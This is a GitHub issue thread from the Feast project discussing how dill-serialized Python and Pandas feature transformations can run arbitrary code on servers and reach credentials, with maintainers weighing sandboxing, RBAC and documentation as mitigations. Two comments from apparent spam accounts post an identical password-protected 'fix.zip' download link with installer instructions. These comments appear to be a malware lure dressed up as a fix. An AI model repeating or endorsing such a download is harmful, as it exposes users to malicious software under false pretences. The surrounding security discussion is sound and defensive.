### ISSUE TITLE
Secure Python/Pandas Transformations

### ISSUE THREAD

**Issue by tokoko** [feast-dev/feast#4446]
**Is your feature request related to a problem? Please describe.**
Transformations with python and pandas modes aren't secure to run in secured remote feast deployments. Arbitrary transformation functions are serialized using dill during `feast apply` and stored in the registry, then retrieved and executed by online/offline feature servers when requested in a server python process. This means that an odfv can easily access any information that's accessible by the server, including environment variables and storage credentials. We need a way to execute these transformations in a secure way. Substrait transforms are handled very differently, so I'll file a separate ticket for it.

**Describe alternatives you've considered**
- Introspection - We could introspect serialized python functions, but this is hopelessly hard to get right.
- Force odfv execution on client-side - We could make it configurable so that a secure deployment can force odfvs to be executed on the client-side rather than on server-side. This is obviously not ideal, plus isn't really feasible unless a client is using feast sdk to access the values, for example when a request if made with a simple http call.
- Execute individual transform functions in a sandbox - something like wasm...(?) not sure if running python in wasm is even possible and what are the limitations.
- Execute transforms in a separate containerized transformation server - This will look similar to how we handle odfv executions in experimental java/go servers. This will obviously incur a performance penalty as data needs to be sent over-the-wire before execution. This is particularly problematic for an offline server as datasets might be huge.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dmartinol** [comment]
My 2 cents here:
- running transformations on the client side can be even more harmful, since ATM only the `DESCRIBE` permission is requested to access an ODF instance, so most of the users could do that
  -  this is, BTW, the current behavior of the `materialize` API, which should be moved to the server side instead (I think there should be an outstanding issue)
- from the RBAC point of view, we can add a more restrictive security check with a specific `TRANSFORM` action to verify that only authorized users can actually run this jobs.
  - we could also add a permission validation API to the Registry server to run this check also on the client side (ATM client code runs with no security checks, unless a remote API is involved)
 
Assuming that the store admin has properly defined the security settings from day 1, the above should help in mitigating the issue:
- only a restricted set of users can create/update ODFs and the related transformation functions
- only a restricted set of users can run the transformations
- a larger set of users can access the ODFs state

Of course, this cannot prevent the function from running harmful code, which seems your main concern instead.

**Comment by tokoko** [comment]
> running transformations on the client side can be even more harmful, since ATM only the `DESCRIBE` permission is requested to access an ODF instance, so most of the users could do that

I don't like the idea of running them client-side either, but not for these reasons, tbh. If a user has a describe permission, that means the contents of the function is known and they are free to run that function anywhere they can, incl. client-side. client side is client side, we can't and shouldn't try to enforce anything over there. The problem here isn't the ability to run a function, it's that they are able to run it inside a secure environment.

> * this is, BTW, the current behavior of the `materialize` API, which should be moved to the server side instead (I think there should be an outstanding issue)

+1 will do

> from the RBAC point of view, we can add a more restrictive security check with a specific `TRANSFORM` action to verify that only authorized users can actually run this jobs.

I don't think this is worth it. As I said, I don't think execution is the root cause here, rather it's the fact that someone can store malicious code in the registry. I don't see RBAC being a solution for it, especially since that already can be restricted with security rules, only a portion of users can be given permissions to apply/update ODFVs.

> this cannot prevent the function from running harmful code, which seems your main concern instead.

yup, atm giving someone permissions to apply and read odfvs basically implies handing over admin credentials.

**Comment by dandawg** [comment]
Thanks for bringing this issue up @tokoko --it's definitely extremely important and complex. Given this vulnerability, from an enterprise leader perspective, I might want to either 1) "turn off" the ability to use UDFs altogether in an environment (through RBAC?) or 2) create a trusted environment (like a GCP project) and restrict access (to trusted users only) at that level. A short term mitigation could be to explain the issue in docs and then advise administrators to use pattern 1 or 2.

I realize this isn't a direct fix. It's just brainstorming on how to help users mitigate the problem for now.

**Comment by tokoko** [comment]
yes, an explanation in the docs seems the best way to go right now. Clients can make sure that only trusted users are allowed to create ODFVs with rbac.

A more long-term fix will probably require a lot of effort/experimentation with some sort of sandboxing/containerization solutions. Another "fix" of sorts (which I'm thinking of pursuing) is to improve `substrait` mode ODFVs which are a lot easier to secure and can potentially eliminate the need for `pandas` mode completely (and hopefully can also cover most of the use cases one would use `python` mode for).
